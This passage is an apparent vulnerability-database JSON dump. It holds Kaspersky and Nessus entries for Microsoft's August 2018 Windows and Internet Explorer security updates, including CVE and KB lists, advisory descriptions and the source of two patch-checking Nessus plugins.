\n[CVE-2018-8381](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8381>)0.0Unknown \n[CVE-2018-8355](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8355>)0.0Unknown \n[CVE-2018-8390](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8390>)0.0Unknown \n[CVE-2018-8387](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8387>)0.0Unknown \n[CVE-2018-8357](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8357>)0.0Unknown \n[CVE-2018-8353](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8353>)0.0Unknown \n[CVE-2018-8383](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8383>)0.0Unknown \n[CVE-2018-8377](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8377>)0.0Unknown \n[CVE-2018-8389](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8389>)0.0Unknown \n[CVE-2018-8316](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8316>)0.0Unknown \n[CVE-2018-8388](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8388>)0.0Unknown \n[CVE-2018-8371](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8371>)0.0Unknown \n[CVE-2018-8351](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8351>)0.0Unknown \n[CVE-2018-8373](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8373>)0.0Unknown \n[CVE-2018-8403](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8403>)0.0Unknown \n[CVE-2018-8370](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8370>)0.0Unknown \n[CVE-2018-8358](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8358>)0.0Unknown\n\n### *KB list*:\n[4343909](<http://support.microsoft.com/kb/4343909>) \n[4343885](<http://support.microsoft.com/kb/4343885>) \n[4343887](<http://support.microsoft.com/kb/4343887>) \n[4343892](<http://support.microsoft.com/kb/4343892>) \n[4343897](<http://support.microsoft.com/kb/4343897>) \n[4343898](<http://support.microsoft.com/kb/4343898>) \n[4343899](<http://support.microsoft.com/kb/4343899>) \n[4343900](<http://support.microsoft.com/kb/4343900>) \n[4343205](<http://support.microsoft.com/kb/4343205>) \n[4343901](<http://support.microsoft.com/kb/4343901>)\n\n### *Microsoft official advisories*:\n\n\n### *Exploitation*:\nThe following public exploits exists for this vulnerability:", "edition": 29, "modified": "2020-06-18T00:00:00", "published": "2018-08-14T00:00:00", "id": "KLA11306", "href": "https://threats.kaspersky.com/en/vulnerability/KLA11306", "title": "\r KLA11306Multiple vulnerabilities in Microsoft Browsers ", "type": "kaspersky", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2021-03-01T06:20:01", "description": "The remote Windows host is missing security update 4343896\nor cumulative update 4343901. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - A remote code execution vulnerability exists in the way\n that Microsoft browsers access objects in memory. The\n vulnerability could corrupt memory in a way that could\n allow an attacker to execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2018-8403)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system. (CVE-2018-8341, CVE-2018-8348)\n\n - A remote code execution vulnerability exists when the\n Windows font library improperly handles specially\n crafted embedded fonts. An attacker who successfully\n exploited the vulnerability could take control of the\n affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2018-8344)\n\n - A remote code execution vulnerability exists in the way\n the scripting engine handles objects in memory in\n Microsoft browsers. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2018-8385)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Win32k component fails to properly\n handle objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. (CVE-2018-8404)\n\n - A remote code execution vulnerability exists when\n Internet Explorer improperly validates hyperlinks before\n loading executable libraries. An attacker who\n successfully exploited this vulnerability could take\n control of an affected system. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2018-8316)\n\n - A remote code execution vulnerability exists in the way\n that the scripting engine handles objects in memory in\n Internet Explorer. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2018-8353, CVE-2018-8371, CVE-2018-8373,\n CVE-2018-8389)\n\n - A remote code execution vulnerability exists in\n Microsoft Windows that could allow remote code execution\n if a .LNK file is processed. An attacker who\n successfully exploited this vulnerability could gain the\n same user rights as the local user. (CVE-2018-8345)\n\n - An elevation of privilege vulnerability exists in the\n Network Driver Interface Specification (NDIS) when\n ndis.sys fails to check the length of a buffer prior to\n copying memory to it. (CVE-2018-8343)\n\n - An information disclosure vulnerability exists when the\n Windows GDI component improperly discloses the contents\n of its memory. An attacker who successfully exploited\n the vulnerability could obtain information to further\n compromise the users system. There are multiple ways an\n attacker could exploit the vulnerability, such as by\n convincing a user to open a specially crafted document,\n or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by\n correcting how the Windows GDI component handles objects\n in memory. (CVE-2018-8394, CVE-2018-8398)\n\n - A remote code execution vulnerability exists in\n &quot;Microsoft COM for Windows&quot; when it fails to\n properly handle serialized objects. An attacker who\n successfully exploited the vulnerability could use a\n specially crafted file or script to perform actions. In\n an email attack scenario, an attacker could exploit the\n vulnerability by sending the specially crafted file to\n the user and convincing the user to open the file.\n (CVE-2018-8349)\n\n - An elevation of privilege vulnerability exists in the\n Windows Installer when the Windows Installer fails to\n properly sanitize input leading to an insecure library\n loading behavior. A locally authenticated attacker could\n run arbitrary code with elevated system privileges. An\n attacker could then install programs; view, change, or\n delete data; or create new accounts with full user\n rights. The security update addresses the vulnerability\n by correcting the input sanitization error to preclude\n unintended elevation. (CVE-2018-8339)\n\n - An information disclosure vulnerability exists in\n Microsoft .NET Framework that could allow an attacker to\n access information in multi-tenant environments. The\n vulnerability is caused when .NET Framework is used in\n high-load/high-density network connections where content\n from one stream can blend into another stream.\n (CVE-2018-8360)\n\n - An information disclosure vulnerability exists when\n affected Microsoft browsers improperly allow cross-frame\n interaction. An attacker who successfully exploited this\n vulnerability could allow an attacker to obtain browser\n frame or window state from a different domain. For an\n attack to be successful, an attacker must persuade a\n user to open a malicious website from a secure website.\n This update addresses the vulnerability by denying\n permission to read the state of the object model, to\n which frames or windows on different domains should not\n have access. (CVE-2018-8351)", "edition": 35, "cvss3": {"score": 8.8, "vector": "AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2018-08-14T00:00:00", "title": "KB4343896: Windows Server 2012 August 2018 Security Update (Foreshadow)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-8343", "CVE-2018-8345", "CVE-2018-8351", "CVE-2018-8403", "CVE-2018-8339", "CVE-2018-8344", "CVE-2018-8394", "CVE-2018-3646", "CVE-2018-8316", "CVE-2018-8373", "CVE-2018-3620", "CVE-2018-8404", "CVE-2018-3615", "CVE-2018-8348", "CVE-2018-8346", "CVE-2018-8341", "CVE-2018-8385", "CVE-2018-8371", "CVE-2018-8360", "CVE-2018-8389", "CVE-2018-8398", "CVE-2018-8353", "CVE-2018-8349"], "modified": "2021-03-02T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS18_AUG_4343901.NASL", "href": "https://www.tenable.com/plugins/nessus/111690", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(111690);\n script_version(\"1.16\");\n script_cvs_date(\"Date: 2019/12/18\");\n\n script_cve_id(\n \"CVE-2018-3615\",\n \"CVE-2018-3620\",\n \"CVE-2018-3646\",\n \"CVE-2018-8316\",\n \"CVE-2018-8339\",\n \"CVE-2018-8341\",\n \"CVE-2018-8343\",\n \"CVE-2018-8344\",\n \"CVE-2018-8345\",\n \"CVE-2018-8348\",\n \"CVE-2018-8349\",\n \"CVE-2018-8351\",\n \"CVE-2018-8353\",\n \"CVE-2018-8360\",\n \"CVE-2018-8371\",\n \"CVE-2018-8373\",\n \"CVE-2018-8385\",\n \"CVE-2018-8389\",\n \"CVE-2018-8394\",\n \"CVE-2018-8398\",\n \"CVE-2018-8403\",\n \"CVE-2018-8404\"\n );\n script_bugtraq_id(\n 104982,\n 104983,\n 104984,\n 104986,\n 104987,\n 104992,\n 104995,\n 104999,\n 105001,\n 105027,\n 105030\n );\n script_xref(name:\"MSKB\", value:\"4343896\");\n script_xref(name:\"MSKB\", value:\"4343901\");\n script_xref(name:\"MSFT\", value:\"MS18-4343896\");\n script_xref(name:\"MSFT\", value:\"MS18-4343901\");\n\n script_name(english:\"KB4343896: Windows Server 2012 August 2018 Security Update (Foreshadow)\");\n script_summary(english:\"Checks for rollup.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4343896\nor cumulative update 4343901. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - A remote code execution vulnerability exists in the way\n that Microsoft browsers access objects in memory. The\n vulnerability could corrupt memory in a way that could\n allow an attacker to execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2018-8403)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system. (CVE-2018-8341, CVE-2018-8348)\n\n - A remote code execution vulnerability exists when the\n Windows font library improperly handles specially\n crafted embedded fonts. An attacker who successfully\n exploited the vulnerability could take control of the\n affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2018-8344)\n\n - A remote code execution vulnerability exists in the way\n the scripting engine handles objects in memory in\n Microsoft browsers. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2018-8385)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Win32k component fails to properly\n handle objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. (CVE-2018-8404)\n\n - A remote code execution vulnerability exists when\n Internet Explorer improperly validates hyperlinks before\n loading executable libraries. An attacker who\n successfully exploited this vulnerability could take\n control of an affected system. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2018-8316)\n\n - A remote code execution vulnerability exists in the way\n that the scripting engine handles objects in memory in\n Internet Explorer. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2018-8353, CVE-2018-8371, CVE-2018-8373,\n CVE-2018-8389)\n\n - A remote code execution vulnerability exists in\n Microsoft Windows that could allow remote code execution\n if a .LNK file is processed. An attacker who\n successfully exploited this vulnerability could gain the\n same user rights as the local user. (CVE-2018-8345)\n\n - An elevation of privilege vulnerability exists in the\n Network Driver Interface Specification (NDIS) when\n ndis.sys fails to check the length of a buffer prior to\n copying memory to it. (CVE-2018-8343)\n\n - An information disclosure vulnerability exists when the\n Windows GDI component improperly discloses the contents\n of its memory. An attacker who successfully exploited\n the vulnerability could obtain information to further\n compromise the users system. There are multiple ways an\n attacker could exploit the vulnerability, such as by\n convincing a user to open a specially crafted document,\n or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by\n correcting how the Windows GDI component handles objects\n in memory. (CVE-2018-8394, CVE-2018-8398)\n\n - A remote code execution vulnerability exists in\n &quot;Microsoft COM for Windows&quot; when it fails to\n properly handle serialized objects. An attacker who\n successfully exploited the vulnerability could use a\n specially crafted file or script to perform actions. In\n an email attack scenario, an attacker could exploit the\n vulnerability by sending the specially crafted file to\n the user and convincing the user to open the file.\n (CVE-2018-8349)\n\n - An elevation of privilege vulnerability exists in the\n Windows Installer when the Windows Installer fails to\n properly sanitize input leading to an insecure library\n loading behavior. A locally authenticated attacker could\n run arbitrary code with elevated system privileges. An\n attacker could then install programs; view, change, or\n delete data; or create new accounts with full user\n rights. The security update addresses the vulnerability\n by correcting the input sanitization error to preclude\n unintended elevation. (CVE-2018-8339)\n\n - An information disclosure vulnerability exists in\n Microsoft .NET Framework that could allow an attacker to\n access information in multi-tenant environments. The\n vulnerability is caused when .NET Framework is used in\n high-load/high-density network connections where content\n from one stream can blend into another stream.\n (CVE-2018-8360)\n\n - An information disclosure vulnerability exists when\n affected Microsoft browsers improperly allow cross-frame\n interaction. An attacker who successfully exploited this\n vulnerability could allow an attacker to obtain browser\n frame or window state from a different domain. For an\n attack to be successful, an attacker must persuade a\n user to open a malicious website from a secure website.\n This update addresses the vulnerability by denying\n permission to read the state of the object model, to\n which frames or windows on different domains should not\n have access. (CVE-2018-8351)\");\n # https://support.microsoft.com/en-us/help/4343896/windows-server-2012-update-kb4343896\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?55516671\");\n # https://support.microsoft.com/en-us/help/4343901/windows-server-2012-update-kb4343901\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?f8d177a9\");\n # https://support.microsoft.com/en-us/help/4072698/windows-server-speculative-execution-side-channel-vulnerabilities-prot\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?8902cebb\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Only update KB4343896 or Cumulative Update KB4343901\nas well as refer to the KB article for additional information.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-8346\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/08/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/08/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/08/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\", 'microsoft_windows_env_vars.nasl');\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"smb_reg_query.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = \"MS18-08\";\nkbs = make_list('4343896', '4343901');\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(win8:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\n# Windows 8 EOL\nproductname = get_kb_item_or_exit(\"SMB/ProductName\", exit_code:1);\nif (\"Windows 8\" >< productname) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"6.2\",\n sp:0,\n rollup_date:\"08_2018\",\n bulletin:bulletin,\n rollup_kb_list:[4343896, 4343901])\n )\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-03-01T06:20:05", "description": "The Internet Explorer installation on the remote host is\nmissing security updates. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - A remote code execution vulnerability exists in the way\n that the scripting engine handles objects in memory in\n Internet Explorer. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2018-8353, CVE-2018-8371, CVE-2018-8373,\n CVE-2018-8389)\n\n - A remote code execution vulnerability exists in the way\n that Microsoft browsers access objects in memory. The\n vulnerability could corrupt memory in a way that could\n allow an attacker to execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2018-8403)\n\n - A remote code execution vulnerability exists in the way\n the scripting engine handles objects in memory in\n Microsoft browsers. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2018-8355, CVE-2018-8372, CVE-2018-8385)\n\n - An information disclosure vulnerability exists when\n affected Microsoft browsers improperly allow cross-frame\n interaction. An attacker who successfully exploited this\n vulnerability could allow an attacker to obtain browser\n frame or window state from a different domain. For an\n attack to be successful, an attacker must persuade a\n user to open a malicious website from a secure website.\n This update addresses the vulnerability by denying\n permission to read the state of the object model, to\n which frames or windows on different domains should not\n have access. (CVE-2018-8351)\n\n - A remote code execution vulnerability exists when\n Internet Explorer improperly validates hyperlinks before\n loading executable libraries. An attacker who\n successfully exploited this vulnerability could take\n control of an affected system. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2018-8316)", "edition": 27, "cvss3": {"score": 7.5, "vector": "AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2018-08-14T00:00:00", "title": "Security Updates for Internet Explorer (August 2018)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-8351", "CVE-2018-8403", "CVE-2018-8372", "CVE-2018-8355", "CVE-2018-8316", "CVE-2018-8373", "CVE-2018-8385", "CVE-2018-8371", "CVE-2018-8389", "CVE-2018-8353"], "modified": "2021-03-02T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS18_AUG_INTERNET_EXPLORER.NASL", "href": "https://www.tenable.com/plugins/nessus/111695", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(111695);\n script_version(\"1.9\");\n script_cvs_date(\"Date: 2019/04/08 10:48:58\");\n\n script_cve_id(\n \"CVE-2018-8316\",\n \"CVE-2018-8351\",\n \"CVE-2018-8353\",\n \"CVE-2018-8355\",\n \"CVE-2018-8371\",\n \"CVE-2018-8372\",\n \"CVE-2018-8373\",\n \"CVE-2018-8385\",\n \"CVE-2018-8389\",\n \"CVE-2018-8403\"\n );\n script_xref(name:\"MSKB\", value:\"4343205\");\n script_xref(name:\"MSKB\", value:\"4343898\");\n script_xref(name:\"MSKB\", value:\"4343900\");\n script_xref(name:\"MSKB\", value:\"4343901\");\n script_xref(name:\"MSFT\", value:\"MS18-4343205\");\n script_xref(name:\"MSFT\", value:\"MS18-4343898\");\n script_xref(name:\"MSFT\", value:\"MS18-4343900\");\n script_xref(name:\"MSFT\", value:\"MS18-4343901\");\n\n script_name(english:\"Security Updates for Internet Explorer (August 2018)\");\n script_summary(english:\"Checks for Microsoft security updates.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The Internet Explorer installation on the remote host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The Internet Explorer installation on the remote host is\nmissing security updates. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - A remote code execution vulnerability exists in the way\n that the scripting engine handles objects in memory in\n Internet Explorer. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2018-8353, CVE-2018-8371, CVE-2018-8373,\n CVE-2018-8389)\n\n - A remote code execution vulnerability exists in the way\n that Microsoft browsers access objects in memory. The\n vulnerability could corrupt memory in a way that could\n allow an attacker to execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2018-8403)\n\n - A remote code execution vulnerability exists in the way\n the scripting engine handles objects in memory in\n Microsoft browsers. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2018-8355, CVE-2018-8372, CVE-2018-8385)\n\n - An information disclosure vulnerability exists when\n affected Microsoft browsers improperly allow cross-frame\n interaction. An attacker who successfully exploited this\n vulnerability could allow an attacker to obtain browser\n frame or window state from a different domain. For an\n attack to be successful, an attacker must persuade a\n user to open a malicious website from a secure website.\n This update addresses the vulnerability by denying\n permission to read the state of the object model, to\n which frames or windows on different domains should not\n have access. (CVE-2018-8351)\n\n - A remote code execution vulnerability exists when\n Internet Explorer improperly validates hyperlinks before\n loading executable libraries. An attacker who\n successfully exploited this vulnerability could take\n control of an affected system. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2018-8316)\");\n # https://support.microsoft.com/en-us/help/4343205/cumulative-security-update-for-internet-explorer\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?f5f0e9e7\");\n # https://support.microsoft.com/en-us/help/4343898/windows-81-update-kb4343898\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?82e63681\");\n # https://support.microsoft.com/en-us/help/4343900/windows-7-update-kb4343900\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?c7990c33\");\n # https://support.microsoft.com/en-us/help/4343901/windows-server-2012-update-kb4343901\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?f8d177a9\");\n # https://support.microsoft.com/en-us/help/4343899/windows-7-update-kb4343899\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?3a469b20\");\n script_set_attribute(attribute:\"solution\", value:\n\"Microsoft has released the following security updates to address this issue: \n -KB4343205\n -KB4343898\n -KB4343900\n -KB4343901\n\nNote that CVE-2018-8316 notes that users can install the\nSecurity-Only patch to cover this vulnerability (KB4343899).\nRefer to the link for KB4343899 for more information.\n\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-8316\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/08/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/08/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/08/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = 'MS18-08';\nkbs = make_list(\n '4343898', # Win 8.1 /2012 R2\n '4343900', # Win 7 / 2008 R2\n '4343901', # Server 2012\n '4343205' # IE Cumulative\n);\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nos = get_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(vista:'2', win7:'1', win8:'0', win81:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nproductname = get_kb_item_or_exit(\"SMB/ProductName\", exit_code:1);\nif (\"Windows 8\" >< productname && \"8.1\" >!< productname)\n audit(AUDIT_OS_SP_NOT_VULN);\nif (\"Vista\" >< productname) audit(AUDIT_OS_SP_NOT_VULN);\n\nif (hotfix_check_server_core() == 1) audit(AUDIT_WIN_SERVER_CORE);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n # Windows 8.1 / Windows Server 2012 R2\n # Internet Explorer 11\n hotfix_is_vulnerable(os:\"6.3\", sp:0, file:\"mshtml.dll\", version:\"11.0.9600.19101\", min_version:\"11.0.9600.16000\", dir:\"\\system32\", bulletin:bulletin, kb:\"4343205\") ||\n\n # Windows Server 2012\n # Internet Explorer 10\n hotfix_is_vulnerable(os:\"6.2\", sp:0, file:\"mshtml.dll\", version:\"10.0.9200.22522\", min_version:\"10.0.9200.16000\", dir:\"\\system32\", bulletin:bulletin, kb:\"4343205\") ||\n\n # Windows 7 / Server 2008 R2\n # Internet Explorer 11\n hotfix_is_vulnerable(os:\"6.1\", sp:1, file:\"mshtml.dll\", version:\"11.0.9600.19101\", min_version:\"11.0.9600.16000\", dir:\"\\system32\", bulletin:bulletin, kb:\"4343205\") ||\n\n # Windows Server 2008\n # Internet Explorer 9\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"mshtml.dll\", version:\"9.0.8112.21252\", min_version:\"9.0.8112.16000\", dir:\"\\system32\", bulletin:bulletin, kb:\"4343205\")\n)\n{\n report = '\\nNote: The fix for this issue is available in either of the following updates:\\n';\n report += ' - KB4343205 : Cumulative Security Update for Internet Explorer\\n';\n if(os == \"6.3\")\n {\n report += ' - KB4343898 : Windows 8.1 / Server 2012 R2 Monthly Rollup\\n';\n hotfix_add_report(bulletin:'MS18-08', kb:'4343898', report);\n }\n else if(os == \"6.2\")\n {\n report += ' - KB4343901 : Windows Server 2012 Monthly Rollup\\n';\n hotfix_add_report(bulletin:'MS18-08', kb:'4343901', report);\n }\n else if(os == \"6.1\")\n {\n report += ' - KB4343900 : Windows 7 / Server 2008 R2 Monthly Rollup\\n';\n hotfix_add_report(bulletin:'MS18-08', kb:'4343900', report);\n }\n set_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-08-19T05:12:52", "description": "The remote Windows host is missing security update 4343897.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system. (CVE-2018-8341, CVE-2018-8348)\n\n - A remote code execution 